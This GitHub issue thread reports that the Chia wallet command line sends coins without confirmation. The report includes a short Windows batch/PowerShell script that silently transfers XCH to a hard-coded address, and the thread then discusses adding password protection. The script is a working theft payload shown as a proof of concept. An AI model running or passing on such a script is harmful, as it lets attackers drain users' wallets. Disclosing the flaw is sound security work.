### ISSUE TITLE
wallet verry low security[BUG]

### ISSUE THREAD

**Issue by ionut4a** [Chia-Network/chia-blockchain#7101]
**Describe the bug**
@echo off

powershell.exe cd (Get-Item "$ENV:LOCALAPPDATA\chia-blockchain\app*\resources\app.asar.unpacked\daemon").fullname ; .\chia.exe wallet send -a 0.24 -t xch1cg9nljvtaka0gzzdy6zsthput4lvdf82pkqcukuunhn6f78lyjhqfs7sdc -m 0.001
if run this in file .bat, .cmd or more, it will be easy to steal xch from anyone. Antivirus will not detect and no any messages: ARE YOU SURE YOU WANT TO SEND 0.24 XCH TO .....

**To Reproduce**

**Expected behavior**

**Screenshots**

**Desktop (please complete the following information):**

- OS:WINDOWS
- OS Version/Flavor: [e.g. CentOS 7.2]
I m not programmator but it was verry easy for me for create this file. everyone ho know something in pc can scam peoples.
please solve it. we don t wan t to be scammed.
[Do not open.zip](https://github.com/Chia-Network/chia-blockchain/files/6755355/Do.not.open.zip)

**Comment by VietTPham** [comment]
Even if you have a confirm message, There are other command that can just bypass it easily.

I think the best option for for the program to have a local password that you have to type in to send coins out.

**Comment by katzenhai2** [comment]
Same with the mnemonic of your wallet: Easily to print out. Obviously there should be password to access the mnemonic or to send XCH.

**Comment by hoffmang9** [comment]
Optional password protection is coming soon - first to Linux. MacOS and Windows use their keyrings which are quite secure. You should be locking your screen on inactivity quickly for the rest of your security posture and using a good OS login password.
